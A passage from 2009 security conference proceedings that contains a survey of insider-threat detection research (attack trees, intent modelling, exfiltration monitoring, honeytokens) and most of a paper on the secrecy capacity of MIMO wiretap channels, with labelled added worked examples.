15. Shamir, A.: Identity-based cryptosystems and signature schemes. In: Blakely, G.R., Chaum, D. (eds.) CRYPTO 1984. LNCS, vol. 196, pp. 47–53. Springer, Heidelberg (1985)
16. Waters, B.: Efficient identity-based encryption without random oracles. In: Cramer, R. (ed.) EUROCRYPT 2005. LNCS, vol. 3494, pp. 114–127. Springer, Heidelberg (2005)
17. Yang, G., Chen, J., Wong, D.S., Deng, X., Wang, D.: A more natural way to construct ID-based identification schemes. In: Katz, J., Yung, M. (eds.) ACNS 2007. LNCS, vol. 4521, pp. 307–322. Springer, Heidelberg (2007)
18. Yao, D., Fazio, N., Dodis, Y., Lysyanskaya, A.: ID-based encryption for complex hierarchies with applications to forward security and broadcast encryption. In: ACM Conference on Computer and Communications Security - CCS 2004, pp. 354–363. ACM Press, New York (2004)
The Trend of the Security Research for the Insider Cyber Threat

Jaeseung Hong, Jongwung Kim, and Jeonghun Cho
School of Electrical Engineering and Computer Science, Kyungpook National University, 1370, Sangyuk-dong, Buk-gu, Daegu, Korea
{psman2, brewer, jcho}@ee.knu.ac.kr
Abstract. In this paper, we discuss insider security, which has become one of the biggest issues in network security. By surveying and analyzing the issues raised by previous studies, we suggest an effective approach for future research. Approximately 90% of recent information leakage incidents are performed by internal workers, which is becoming a more serious problem than outsider attacks. An information leakage incident not only makes an organization or a company lose information but also deals a hard blow to its image. To prevent economic loss and damage to the image in advance, we need various research and development efforts toward an effective solution. Keywords: insider threat, insider security, malicious intent.
1 Introduction

Until recently, cyber security considered only external attacks when protecting internal resources. Firewalls, IDS/IPS, VPNs and antivirus are used to protect the system and the network against cracking, viruses and worms. However, incidents such as core technology leakage, customer information leakage or embezzlement are frequently performed by insiders at companies and financial institutions. According to the Small Business Administration in Korea, 90% of information leakage incidents are caused by internal staff. Because the damage from information leakage incidents is getting serious, insider security has become one of the big issues in network security. Internal workers have access rights to various internal resources for their own business. They have a lot of knowledge about the organization's systems; therefore, they know where the resource or information they want is and how to access it. If they want, they can evade the security system to obtain the desired resource or information. If these insiders have malicious intent, they can cause serious damage to an organization. Although research on insider security is actively in progress in academia and in company laboratories, it is difficult to solve every problem with one solution because of the nature of insider security. In this paper, by analyzing and surveying the results of recent academic research on insider security, we identify the problems of existing research in order to present an effective approach for future insider security research.

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 100–107, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 The Insider Security

In modern society, most employees use a computer for their own business. They access the internal resources of an organization through computer networks, and can reach the internal resources they need at any time. Accordingly, we call a direct or indirect member of the organization who has the right to access internal resources an insider. Insiders access internal resources for their work every day using a computer, and in this way the organization's information is stored on and passed to servers over the computer network. Organizations and large corporations have invested a lot of money and effort in defending against external attacks, whose purpose is to seize important information or simply to destroy a system. They have used various solutions, from a basic firewall to intelligent defense systems such as IDS/IPS, to deal actively with external attacks. Because defense technology has improved along with more intelligent outside attacks, today we have significant defense solutions against outside attacks. According to the Computer Crime and Security Survey [1,2,3,4] announced by CSI/FBI in the United States, the damage from outsider attacks has decreased continuously since 2001. However, the damage from insider threats has increased relatively, even though external attacks have decreased as a share of total damage. External attacks via a network occur more often than insider threats; therefore, until now the focus of network security has been defense against external attacks. However, according to the CSI/FBI survey [1], computer security incidents by insiders account for 15.37% in Table 1. This percentage is a high loss for the occurrence rate. Security incidents by insiders do not have a high probability of occurrence, but if one occurs, it causes fatal damage to the organization, and its cause is difficult to analyze and cope with.
Recently, companies and organizations have invested heavily in preventing secret outflows by insiders, but there are still many problems. Insiders have a lot of knowledge about the system structure of the organization and know well where the resource they want is. If an insider has a malicious purpose to obtain the organization's resources, it is possible to gain the information by using that knowledge to evade the security system.

Table 1. Annual losses from CSI/FBI surveys

Year   Total loss     Insider threat loss   Percentage
2001   377,828,700    41,065,650            10.86 %
2002   455,848,000    54,602,000            11.98 %
2003   201,797,340    12,173,500             6.03 %
2004   144,496,560    14,879,260            10.30 %
2005   130,104,542    38,089,550            29.28 %
2006    52,494,290    12,466,810            23.74 %

All of the employees' behavior could be controlled by a strong security policy for internal security, but that can significantly reduce work efficiency. When insiders have a malicious purpose, they show some visible signs, such as trying to access unauthorized resources or storing the information they need in a personal database. In this paper, we analyze various modeling techniques for insiders' behavioral patterns, and then we present how to prevent and detect potential insider threats effectively.
3 The Previous Researches for the Insider Threat

Through the results of existing studies, we will discuss the significant issues of insider security and some of the problems that appear while developing an insider security system.

3.1 Prediction Model

For predicting the insider threat, Hui Wang, Shufen Liu and Xinjia Zhang proposed an approach using a tree structure in [9]. In that paper, the authors referred to the attack tree of Bruce Schneier [10] for their own approach. The attack tree can be used for detecting various internal or external attacks. They introduced the System Attack Tree in a new way, which improves on the attack tree. The System Attack Tree configures a tree after collecting all of the attack paths in a system, and detects the insider threat.
Fig. 1. The framework of insider threat model
The insider gives the system information regarding the purpose of use before entering. From the given information, the Signature Powered Revised Instruction Table (SPRINT) is configured, and the system builds Aos, the set of intended operations according to the insider's SPRINT plan. Finally, based on the Minimal Attack Tree generated from Aos, the security system observes the actual user actions to detect malicious intent. The overall configuration is shown below.
Fig. 2. Flow diagram for insider threat model
As shown in Figure 1, when the insider connects to a system, the Interactive Agent requests some information regarding the purpose of use, and the user has to wait for a while. After configuring Aos with the given information, the Central Agent makes the Minimal Attack Tree by comparing Aos with the System Attack Tree. In this phase, the insider can work while the Predicting Agent observes the user's behavior against the Minimal Attack Tree to detect an attack possibility. If it detects malicious intent, the Predicting Agent halts the insider's behavior.

3.2 Intent-Driven Insider Threat Detection

E. Santos, Hien Nguyen and Fei Yu propose an intent-driven framework, which consists of a user model and insider detection metrics, to automatically detect insider threats in [11]. Many traditional studies of the insider threat have focused on action-based, social-network and document-based approaches; however, the authors discuss grasping the intent of the user. When users access internal resources, they have intentions, which are malicious or not. If some insiders have malicious intent, they show some of the following features [11]: they may use many non-supporting queries or put more constraints on non-supporting queries when searching for information; they may neglect non-supporting documents, use old documents when supporting documents are not enough, or even fabricate pieces of information; and when drawing up reports, they may quote the same documents and overstate recorded information. Through experiments and analysis, malicious intents can be classified by grasping the insider's intents. In that paper, the user models are based on the IPC model [12, 13], which includes an interest list, a preference network and a context network. The context network is an especially important one. It is a document graph (DG), which is used to model a user's knowledge context. A DG is generated for each document from the textual deliverables.

A DG consists of concept nodes and relations between them. Two sorts of relations are defined, the "Is a" relation and the "Related to" relation, as shown in Figure 3. Users' context networks are tracked and analyzed by detection metrics. A similarity
Fig. 3. An example of a Document Graph
value between a document viewed by the analyst and their context network can be computed by the following equation [14]:

$$\mathrm{Similarity}(DG_1, DG_2) = \frac{n}{2N} + \frac{m}{2M} \qquad (1)$$

In the equation, $n$ denotes the number of concept nodes shared by $DG_1$ and $DG_2$, and $N$ denotes the total number of concept nodes in $DG_1$. Likewise, $m$ and $M$ are parallel to $n$ and $N$ except that they count the relation nodes instead of the concept nodes.

3.3 Sensitive Information Dissemination Detection

Sensitive Information Dissemination Detection (SIDD) was proposed by Yali Liu, Cherita Corbett, Rennie Archibald and Biswanath in [15]. This study uses network traffic to detect the insider threat. It is similar to the traditional method that compares traffic statistics at each hour. When someone accesses specific internal data, its patterns are analyzed. Figure 4 illustrates one scenario: a company X outsources its customer service to another company Y by establishing a shared (enterprise) network connecting their corporate LANs. In the service process, X needs to provide proprietary documents and manuals to Y, but it does not wish to share some sensitive/proprietary information. A malicious insider Z seeks to create backdoor networks to enable loss or damage of protected information and to exfiltrate sensitive/proprietary information using the enterprise's network resources. To detect and prevent the leakage of sensitive information, SIDD is placed at the network egress to monitor the traffic flow outbound from the protected network. In the first step, the captured network traffic is filtered into the application identification system to extract traffic features. In the second step, after the traffic flow passes the application identification check, it passes into the Content Retrieval process, and the content of the application is analyzed by the content detection stage. In this final step, SIDD may only be able to detect the presence of hidden content and not fully recover the content for comparison. When the internal network traffic passes through, SIDD parses the flow and waits for the server response. It may perform up to three phases of checks within the response time to determine how to filter outgoing traffic to prevent exfiltration of sensitive information.
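The document-graph similarity of equation (1) in Section 3.2, as an added example that is not code from [11] or [14]: a DG is built from "Is a" and "Related to" triples, a relation node counts as shared only when both endpoints and its type coincide (an assumed reading of "relation node"), and the context network and the two viewed documents are constructed sample data. It also shows the measure is normalised by $DG_1$ alone, so it is not symmetric.

```python
"""Document-graph similarity of equation (1), as an added example (not code
from [11] or [14]).  A document graph (DG) has concept nodes joined by "Is a"
and "Related to" relations; here a relation node is the triple
(source, type, target), so it is shared only if both endpoints and the type
coincide.  All graphs below are constructed sample data.
"""
from dataclasses import dataclass, field

RELATION_TYPES = ("Is a", "Related to")


@dataclass
class DocumentGraph:
    concepts: set = field(default_factory=set)
    relations: set = field(default_factory=set)

    def add(self, source, relation, target):
        """Add one relation node and the two concept nodes it links."""
        if relation not in RELATION_TYPES:
            raise ValueError(f"unknown relation type: {relation!r}")
        self.concepts.update((source, target))
        self.relations.add((source, relation, target))
        return self


def build_graph(triples):
    """Build a DG from an iterable of (source, relation, target) triples."""
    dg = DocumentGraph()
    for source, relation, target in triples:
        dg.add(source, relation, target)
    return dg


def similarity(dg1, dg2):
    """Equation (1): Similarity(DG1, DG2) = n/(2N) + m/(2M).

    n = concept nodes shared by DG1 and DG2, N = concept nodes of DG1,
    m = relation nodes shared, M = relation nodes of DG1.
    The normalisation uses DG1 only, so the measure is not symmetric.
    A DG1 with no relation nodes contributes 0 for the second term
    (assumed convention, since (1) leaves M = 0 undefined).
    """
    if not dg1.concepts:
        raise ValueError("DG1 has no concept nodes")
    n = len(dg1.concepts & dg2.concepts)
    m = len(dg1.relations & dg2.relations)
    concept_term = n / (2 * len(dg1.concepts))
    relation_term = m / (2 * len(dg1.relations)) if dg1.relations else 0.0
    return concept_term + relation_term


# Constructed analyst context network (DG1) and two viewed documents (DG2).
CONTEXT = build_graph([
    ("insider threat", "Is a", "security threat"),
    ("insider threat", "Related to", "access right"),
    ("honeytoken", "Related to", "insider threat"),
    ("honeytoken", "Is a", "honeypot"),
])
SUPPORTING_DOC = build_graph([
    ("insider threat", "Is a", "security threat"),
    ("insider threat", "Related to", "access right"),
    ("firewall", "Related to", "security threat"),
])
UNRELATED_DOC = build_graph([
    ("wireless channel", "Related to", "eavesdropper"),
    ("eavesdropper", "Is a", "security threat"),
])


def rank_by_similarity(context, documents):
    """Order named documents by their similarity to the analyst's context."""
    scored = [(name, similarity(context, dg)) for name, dg in documents.items()]
    return sorted(scored, key=lambda item: item[1], reverse=True)


if __name__ == "__main__":
    docs = {"supporting": SUPPORTING_DOC, "unrelated": UNRELATED_DOC}
    for name, score in rank_by_similarity(CONTEXT, docs):
        print(f"{name}: {score:.3f}")
```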
Fig. 4. A motivating example for sensitive data exfiltration and detection

3.4 Honeypot

The honeypot is able not only to detect a malicious external attack and lure the attacker for interception but also to analyze the attacker's patterns in order to respond to new attack techniques. We lure an outside attacker into a vulnerable system and collect their attack techniques, tools, behavioral patterns and so on. The honeypot was originally developed for defending against external attacks, but Lance Spitzner showed a detection technique using the honeypot for the insider threat in [8]. In the middle of the 1990s, David Clock first proposed the honeypot. When an external attack occurs, by attracting the attack to the honeypot we can intercept it and collect information about the attacker's behavioral patterns, techniques and tools. Especially when IDS and IPS are powerless against a zero-day attack, the honeypot collects the attacker's information and new attack techniques, and protects the internal system. Lance Spitzner moved the honeypot, which was developed for protecting the system from external attacks, into the system for detecting the insider threat. An insider with malicious intent might be interested in IDs, passwords, confidential information and so on. So a Honeytoken [8], configured as a document or e-mail that appears to include confidential information, is placed into the system. All of the insiders have the access right to approach the Honeytoken, although its content is not genuine. If someone accesses the Honeytoken, we need to suspect that person's malicious intent. The Honeytoken can also be placed into a search engine for observing the insider threat. If the insider searches for specific confidential information in the organization's intranet, the search engine shows the Honeytoken link to the insider. Because the insider has the access right for the intranet, a search by itself does not constitute an insider threat. However, clicking the Honeytoken link means that the insider is interested in the confidential information, and that may develop into an insider threat.
4 Problems of the Current Insider Security System

Now a lot of research is still in progress, and many insider security solutions have been released based on the research. However, the results of insider security solutions are still not as satisfactory as those of external security solutions. The biggest problem in developing an insider security solution is that the insider has a lot of information about the organization and understands the organization's structure. The insider not only knows where the desired information is but also has sufficient knowledge about the internal security system. If one of the insiders has a malicious intent to take confidential information, it is not difficult. It is very difficult to protect internal resources from a malicious insider using any excellent algorithm or technique. In particular, it is practically impossible to prevent insider security incidents by a system manager. Because system managers manage all of the systems as well as the insider security system, if they have malicious intent, they are the biggest insider threat.
5 Conclusions

To prevent the insider threat, we need a security system that not only protects internal resources but also grasps the insider's behavioral patterns or intents in advance. Also, if an insider security incident happens, the security system has to grasp the cause and track the attacker efficiently. To prevent insider threats by the system manager, the management domains and permissions of the system manager have to be divided according to the related work, and the business has to have interdependence between the works to prevent one person from having too many permissions. A malicious insider becomes more intelligent as insider security systems improve. We have to think about why the insider threat happens. If the malicious insider is not simply a spy, he/she is a person who is discontented for various reasons. Sometimes insiders are dissatisfied because of employment, wages, promotion and so on. The more this dissatisfaction grows, the more malicious intent the insider will have, out of a compensatory mentality. Establishing a powerful insider security system is important; however, forming a mutual trust relationship between the insider and the organization through appropriate evaluation and compensation according to business ability, to lower the possibility of the insider threat, is also important.
Acknowledgements This research was supported by the MKE(The Ministry of Knowledge Economy), Korea, under the ITRC(Information Technology Research Center) Support program supervised by the NIPA(National IT industry Promotion Agency) (NIPA-2009C1090-0902-0020).
References
1. Richardson, R.: 2003 CSI/FBI Computer Crime and Security Survey. Computer Security Institute (2003)
2. Gordon, L.A., Loeb, M.P., Lucyshyn, W., Richardson, R.: 2004 CSI/FBI Computer Crime and Security Survey. Computer Security Institute (2004)
3. Gordon, L.A., Loeb, M.P., Lucyshyn, W., Richardson, R.: 2005 CSI/FBI Computer Crime and Security Survey. Computer Security Institute (2005)
4. Gordon, L.A., Loeb, M.P., Lucyshyn, W., Richardson, R.: 2006 CSI/FBI Computer Crime and Security Survey. Computer Security Institute (2006)
5. Althebyan, Q., Panda, B.: A Knowledge-Base Model for Insider Threat Prediction. In: Proceedings of the 2007 IEEE Workshop on Information Assurance. United States Military Academy, West Point (2007)
6. Althebyan, Q., Panda, B.: A Knowledge-Based Bayesian Model for Analyzing a System after an Insider Attack. To appear in the IFIP 23rd International Information Security Conference, Milan, Italy (September 2008)
7. Althebyan, Q., Panda, B.: Performance analysis of an insider threat mitigation model. In: ICDIM 2008, pp. 703–709 (2008)
8. Spitzner, L.: Honeypots: Catching the Insider Threat. In: 19th Annual Computer Security Applications Conference, ACSAC 2003 (2003)
9. Wang, H., Liu, S., Zhang, X.: A Prediction Model of Insider Threat Based on Multi-agent. In: 2006 1st International Symposium on Pervasive Computing and Applications (2006)
10. Schneier, B.: Attack trees: Modeling security threats. Dr. Dobb's Journal (December 1999)
11. Santos Jr., E., Nguyen, H., Yu, F., Kim, K., Li, D., Wilkinson, J.T., Olson, A., Jacob, R.: Intent-driven Insider Threat Detection in Intelligence Analyses. In: 2008 IEEE/WIC/ACM International Conference on Web Intelligence and Intelligent Agent Technology (2008)
12. Nguyen, H., Santos Jr., E., Zhao, Q., Wang, H.: Capturing User Intent for Information Retrieval. In: Proceedings of the 48th Annual Meeting for the Human Factors and Ergonomics Society (HFES 2004), New Orleans, LA, pp. 371–375 (2004)
13. Santos Jr., E., Nguyen, H., Zhao, Q., Wang, H.: User modelling for intent prediction in information analysis. In: Proceedings of the 47th Annual Meeting for the Human Factors and Ergonomics Society, pp. 1034–1038 (2003)
14. Montes-y-Gómez, M., Gelbukh, A., López-López, A.: Comparison of Conceptual Graphs. In: Cairó, O., Cantú, F.J. (eds.) MICAI 2000. LNCS, vol. 1793. Springer, Heidelberg (2000)
15. Liu, Y., Corbett, C., Archibald, R., Biswanath: SIDD: A Framework for Detecting Sensitive Data Exfiltration by an Insider Attack. In: Proceedings of the 42nd Hawaii International Conference on System Sciences (2009)
MIMO Wiretap Channel: A Scalar Approach

Mohammad Rakibul Islam and Jinsang Kim
Dept. of Electronics and Radio Engineering, Kyung Hee University, 1 Seocheon, Kihung, Yongin, Gyeonggi, 449-701, Korea
[email protected]

Abstract. Although conventional cryptographic security mechanisms are essential to the overall problem of security, the openness of the wireless medium poses both threats and opportunities for securing transmission. In this paper, a Gaussian multiple input multiple output multiple eavesdropper (MIMOME) channel is considered where a transmitter is communicating with a receiver in the presence of an eavesdropper. We present a technique for determining the secrecy capacity of the MIMO channel under Gaussian noise. To do so, we transform the degraded MIMOME channel into multiple single input multiple output multiple eavesdropper (SIMOME) channels and then use a scalar approach to convert it into two equivalent multiple input single output (MISO) channels. Keywords: Secrecy capacity, MIMO, wiretap channel, covariance matrix, fading.
1 Introduction
Wireless media is an open medium for communication and is vulnerable to eavesdropping. The openness of the transmission medium makes eavesdropping extremely easy: anyone within communication range can listen to the traffic in the air and possibly extract information. However, the unique properties of the wireless medium might provide ways of combating such security threats. For example, due to random fading, the intended receiver will have a channel different from an eavesdropper's when she is a reasonable distance away. This difference can be utilized to secure the communication between the transmitter and the intended receiver. The eavesdropping attack was first studied by Wyner using a single-user wire-tap channel in [1]. Given the wire-tapper's observation, secrecy is measured by the message equivocation rate at the wire-tapper and is defined as the entropy of the message at the wire-tapper. Wyner models the wire-tapper's channel as a degraded version of the channel from the transmitter to the legitimate receiver, which is a reasonable assumption in a wired channel. Then he identifies the rate-equivocation region and secrecy capacity. Wyner's result was extended to the Gaussian wire-tap channel in [2] to show that Gaussian signalling is optimal, and the secrecy capacity was denoted as the difference between the capacities of the main and the eavesdropping channels. Csiszár and Körner [3] studied the general wiretap channel with single-transmitter, single-receiver, single-eavesdropper,

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 108–115, 2009. © Springer-Verlag Berlin Heidelberg 2009
discrete memoryless channel with secrecy constraints, and found the expression for the secrecy capacity. The expression is in the form of the maximization of the difference between two mutual informations involving an auxiliary random variable, which is interpreted as performing pre-processing on the information. The secrecy capacity calculation for a given channel requires the solution of this maximization problem in terms of the joint distribution of the auxiliary random variable and the channel input. The use of multiple transmit and receive antennas has been studied in [4], and the results show that the achievable rates increase in the absence of secrecy constraints. Since the Gaussian multiple input multiple output (MIMO) wire-tap channel is a special case of the single-transmitter, single-receiver, single-eavesdropper wire-tap channel and is not degraded in general, finding its secrecy capacity involves identifying the optimum joint distribution of the auxiliary random variable representing pre-processing and the channel input. A two-step solution procedure is followed by researchers to solve this optimization problem for non-degraded channels. In the first step, a feasible solution is identified, which is an achievable scheme, and in the second step a tight upper bound that meets this feasible solution is developed, which is the tight converse. The first paper studying secrecy in MIMO communications [5] proposes an achievable scheme where the transmitter uses its multiple transmit antennas to transmit only in the null space of the eavesdropper's channel, thereby preventing any eavesdropping. In [6], the Gaussian single-input multiple-output (SIMO) wire-tap channel is studied, and an equivalent scalar Gaussian channel is proposed. To do so, the channel was transformed into a scalar Gaussian wiretap channel using standard techniques of communication theory. The result is then used to study the impact of slow fading on the secrecy capacity of the channel.

Secrecy capacity in terms of outage probability is proposed in [7,8], and a complete characterization of the maximum transmission rate at which the eavesdropper is unable to decode any information is provided. It is shown that in the presence of fading, information-theoretic security is achievable even when the eavesdropper has a better average signal-to-noise ratio (SNR) than the legitimate receiver. In this paper we try to find the secrecy capacity of a MIMOME channel using a scalar Gaussian approach. We consider that the MIMOME channel is a combination of several SIMOME channels and find the secrecy capacity. It is to be noted that the MIMO wiretap channel is synonymous with the MIMOME channel. The remainder of this paper is organized as follows: In Section 2, we describe the MIMO Gaussian wiretap channel. In Section 3, the capacity analysis is done. Then Section 4 concludes this paper.
2 MIMO Gaussian Wiretap Channel
We consider a degraded communication system shown in fig. 1 as our system with a transmitter, a receiver and an eavesdropper, each equipped with multiple antennas. A legitimate user named Alice wants to send messages to another user, say Bob. The message block is encoded into a codeword and transmitted over a
[Figure 1: block diagram with input x, outputs y (Bob) and z (Eve), noise n and w, channels H and G, transmitter Alice]
Fig. 1. Degraded broadcast channel
discrete time channel. A third party named Eve is capable of eavesdropping on the signals sent by Alice by observing the channel output. The user and eavesdropper channel attenuations can be represented by $N_r \times N_t$ and $M_r \times N_r$ vectors $H$ and $G$, where $N_t$ is the number of transmit antennas, and $N_r$ and $M_r$ are the numbers of antennas at the legitimate receiver and the eavesdropper. Our objective is to determine the secrecy capacity of the MIMO Gaussian wiretap channel using the scalar approach. The received signals at the receiver and the eavesdropper in the $k$-th time slot are

$$y[k] = Hx[k] + n[k] \qquad (1)$$

$$z[k] = Gy[k] + w[k] \qquad (2)$$
where $n$ and $w$ are independent random vectors, each of them complex and jointly Gaussian distributed with mean $0$ and non-singular covariance matrices $\Sigma_1$ and $\Sigma_2$ respectively. $H$ and $G$ are known and fixed. When the main and eavesdropper channels experience fading, $H$ and $G$ are assumed to be vectors of i.i.d. zero-mean unit-variance complex circularly symmetric Gaussian random variables.

Theorem 1. A MIMOME channel can be represented as a summation of several Gaussian wiretap channels, and the main channel and eavesdropper channel outputs can be written as

$$y[k] = \sum_{i=1}^{N_t} \bigl(h_i^2 x_i[k] + n_i[k]\bigr) \qquad (3)$$

and

$$z[k] = \sum_{i=1}^{N_t} \bigl(g_i^2 x_i[k] + w_i[k]\bigr) \qquad (4)$$

Proof: A multiple input multiple output multiple eavesdropper (MIMOME) channel can be seen as multiple parallel single input multiple output multiple eavesdropper (SIMOME) channels. From [6] we know that a SIMOME channel can be represented by

$$y_i[k] = h_i^2 x_i[k] + n_i[k] \qquad (5)$$
and

$$z_i[k] = g_i^2 x_i[k] + w_i[k] \qquad (6)$$

Therefore, Eq. 5 and Eq. 6 prove Theorem 1. In the next section, we will derive the secrecy capacity using these results.
3 Capacity Analysis

3.1 Secrecy Capacity
The equivocation rate $R_e$ is the conditional entropy of the transmitted message, conditioned on the received signal at the eavesdropper. The equivocation rate is a measure of the amount of information that the eavesdropper can attain about the message, and quantifies the level of secrecy in the system. The secrecy capacity $C_S$ is the largest rate $R$ achievable with perfect secrecy, i.e., $R_e = R$. The main channel capacity for SIMOME can be written as
$$C_{M_i} = \tfrac{1}{2}\log\left(1 + h_i^2 P\right) = \tfrac{1}{2}\log\left(1 + h_i^{\dagger}\Sigma_{1i}^{-1} h_i P\right)$$
Again, the eavesdropper channel capacity for SIMOME is
$$C_{W_i} = \tfrac{1}{2}\log\left(1 + g_i^2 P\right) = \tfrac{1}{2}\log\left(1 + (G h_i)^{\dagger}\left(G \Sigma_{1i} G^{\dagger} + \Sigma_2\right)^{-1} G h_i P\right)$$
The MIMOME channel can be thought of as multiple SIMOME channels, and according to Fig. 2 a MIMOME channel can be converted to two MISO channels, one for the main channel and the other for the eavesdropper channel. Consider the channel gain parameter for the main channel to be $h_m = [h_1^2, h_2^2, \ldots, h_{N_t}^2]$ and for the eavesdropper channel $g_m = [g_1^2, g_2^2, \ldots, g_{N_t}^2]$. Also consider that the channel knowledge of the main channel and the eavesdropper channel is unknown at the transmitter; then the channel capacities for the MIMOME channel can be written as
$$C_M = \tfrac{1}{2}\log\left(1 + \frac{\|h_m\|^2 P}{N_t}\right)$$
$$C_W = \tfrac{1}{2}\log\left(1 + \frac{\|g_m\|^2 P}{N_t}\right)$$
Remark 1: Assume that the MISO channels are identical for both the main channel and the eavesdropper channel, i.e. $h_1^2 = h_2^2 = \ldots = h_{N_t}^2 = h^2$ and $g_1^2 = g_2^2 = \ldots = g_{N_t}^2 = g^2$. Therefore the capacity equations become
$$C_M = \tfrac{1}{2}\log\left(1 + h^2 P\right) \qquad (7)$$
[Fig. 2 (figure not reproduced): (a) a SIMOME channel with input $x$, main-channel gains $H_{11}, H_{12}, H_{13}$, eavesdropper gains $G_{11}, \ldots, G_{33}$ and outputs $y$, $z$, beside its two-output equivalent with scalar gains $h^2$ and $g^2$; (b) a MIMOME channel with gains $H_{11}, \ldots, H_{33}$ and $G_{11}, \ldots, G_{33}$, beside its two-output equivalent with per-antenna gains $h_1^2, h_2^2, h_3^2$ and $g_1^2, g_2^2, g_3^2$.]
Fig. 2. (a) 2 output representation of SIMOME channel (b) 2 output representation of MIMOME channel
$$C_W = \tfrac{1}{2}\log\left(1 + g^2 P\right) \qquad (8)$$
This is the same as the converted SIMOME channel, as capacity does not increase using multiple SIMOME channels. So, the secrecy capacity can be written from [6] as
$$C_S = \tfrac{1}{2}\log\left(\frac{1 + h^2\,\mathrm{SNR}}{1 + \frac{\sigma_1^2 h^2}{\sigma_1^2 + \sigma_2^2}\,\mathrm{SNR}}\right) \qquad (9)$$
Remark 2: From Eq. 9, it can be shown that $\sigma_2^2 > 0$ makes $\frac{\sigma_1^2}{\sigma_1^2 + \sigma_2^2} < 1$ and in turn makes the secrecy capacity $C_S$ positive. An interesting conclusion is that secret communication is possible when the eavesdropper channel is noisy.
3.2 Existence of Secrecy Capacity
Now we consider the existence of secrecy capacity in the main channel transmission. We know from the previous section that secret communication is possible when the eavesdropper channel is noisy. Again, from Eq. 1 and Eq. 2 we know that $n$ and $w$ are independent random vectors, each of them jointly Gaussian distributed with mean 0 and non-singular covariance matrices $\Sigma_1$ and $\Sigma_2$ respectively. As $\Sigma_1 = \sigma_1^2 I_{N_r}$ and $\Sigma_2 = \sigma_2^2 I_{M_r}$, the probability distributions for $\sigma_1^2$ and $\sigma_2^2$ can be written as $\Pr\{\sigma_1^2\} = \frac{1}{\sqrt{2\pi}} e^{-(\sigma_1^2)^2/2}$ and $\Pr\{\sigma_2^2\} = \frac{1}{\sqrt{2\pi}} e^{-(\sigma_2^2)^2/2}$. It is to be noted that the secrecy capacity $C_S$ becomes positive when $\sigma_2^2 > 0$.
Proposition 1: The probability of existence of a nonzero secrecy capacity where the channel knowledge for both main and eavesdropper channels is unknown is given by
$$\Pr(C_S > 0) = \Pr\left(\sigma_2^2 > 0\right) = \frac{1}{\sqrt{2\pi}} \int_0^{\infty} e^{-(\sigma_2^2)^2/2}\, d\sigma_2^2 = \tfrac{1}{2}\,\mathrm{erfc}(0) = \tfrac{1}{2}$$
where $\mathrm{erfc}(z) = \frac{2}{\sqrt{\pi}} \int_z^{\infty} e^{-t^2}\, dt$.
3.3 Outage Probability under Slow Fading
In contrast with the Gaussian wiretap channel, the fading scenario doesn't require the average SNR of the main channel to be greater than the average SNR of the eavesdropper's channel for a strictly positive (outage) secrecy capacity. In the presence of fading there is always a finite probability that the instantaneous SNR of the main channel is higher than the instantaneous SNR of the eavesdropper's channel [7]. We now extend the idea of secrecy capacity to the case when the channel parameters are random but fixed for all time. In slow fading, $H$ and $G$ are random processes and the secrecy capacity is no longer a deterministic value but a random process itself. We denote the outage event as
$$\text{Outage} = \{ C_S < R \};\quad R > 0 \qquad (10)$$
and the probability of outage as
$$P_{out} = \Pr\{ C_S < R \} \qquad (11)$$
Proposition 2: The probability of outage can be written as
$$P_{out} = \Pr\{ C_S < R \} = \Pr\left\{ \tfrac{1}{2}\log\left(\frac{1 + h^2\,\mathrm{SNR}}{1 + \frac{\sigma_1^2 h^2}{\sigma_1^2 + \sigma_2^2}\,\mathrm{SNR}}\right) < R \right\} \qquad (12)$$
Remark 3: If the main channel is extremely noisy, we can take $\sigma_1^2 \gg \sigma_2^2$ and then $C_S \to 0$. In this case, the system is in outage with probability 1. On the other hand, if the eavesdropper channel is extremely noisy, then we can take $\sigma_1^2 \ll \sigma_2^2$ and the secrecy capacity $C_S$ tends to $\tfrac{1}{2}\log\left(1 + h^2\,\mathrm{SNR}\right)$. Therefore Eq. 12 reduces to $P_{out} = \Pr\{ \tfrac{1}{2}\log\left(1 + h^2\,\mathrm{SNR}\right) < R \}$.
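As an added worked step, not part of the original paper, Eq. 12 can be turned into a threshold on the main channel gain $h^2$, which makes both limits of Remark 3 explicit. Write $\rho = \sigma_1^2/(\sigma_1^2 + \sigma_2^2)$, so that $0 < \rho \le 1$ and Eq. 9 reads $C_S = \tfrac{1}{2}\log\frac{1 + h^2\,\mathrm{SNR}}{1 + \rho\, h^2\,\mathrm{SNR}}$; the logarithm is taken to base 2 so that $R$ is in bits:

$$C_S < R \iff \frac{1 + h^2\,\mathrm{SNR}}{1 + \rho\, h^2\,\mathrm{SNR}} < 2^{2R} \iff h^2\,\mathrm{SNR}\,\left(1 - \rho\, 2^{2R}\right) < 2^{2R} - 1 .$$

If $\rho\, 2^{2R} \ge 1$, the left-hand side is non-positive while the right-hand side is positive for every $R > 0$, so the inequality always holds and $P_{out} = 1$; this is the $\sigma_1^2 \gg \sigma_2^2$ limit of Remark 3 ($\rho \to 1$). Otherwise

$$P_{out} = \Pr\left\{ h^2 < \frac{2^{2R} - 1}{\mathrm{SNR}\,\left(1 - \rho\, 2^{2R}\right)} \right\},$$

and as $\sigma_2^2 \to \infty$ ($\rho \to 0$) this reduces to $P_{out} = \Pr\{ h^2 < (2^{2R} - 1)/\mathrm{SNR} \}$, which is exactly the reduced form of Eq. 12 given in Remark 3.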
4 Conclusion
We considered a MIMOME channel where a transmitter is communicating with a receiver in the presence of an eavesdropper. The transmitter, receiver and eavesdropper are equipped with multiple antennas. We presented a technique for determining the secrecy capacity of the MIMOME channel under Gaussian noise. To do so, we transformed the MIMO Gaussian wiretap channel into multiple SIMO Gaussian wiretap channels and then used a scalar approach based on standard techniques of communications theory. We derived the secrecy capacity equation, and the result shows that the existence of secrecy capacity depends on the eavesdropper noise level. We also analyzed the probability of outage in a slow fading scenario.
Acknowledgment This work was supported by Korea Research Foundation (grant no.: 2009-0074806).
References
1. Wyner, A.D.: The wire-tap channel. Bell Syst. Tech. J. 54(8), 210 (1975)
2. Leung, S.K., Cheong, Y., Hellman, M.E.: The Gaussian wire-tap channel. IEEE Trans. on Information Theory 24(4), 451–456 (1978)
3. Csiszar, I., Korner, J.: Broadcast channels with confidential messages. IEEE Trans. on Information Theory 24(3), 339–348 (1978)
4. Telatar, I.E.: Capacity of multi-antenna Gaussian channels. European Trans. Telecommunications 10, 585–595 (1999)
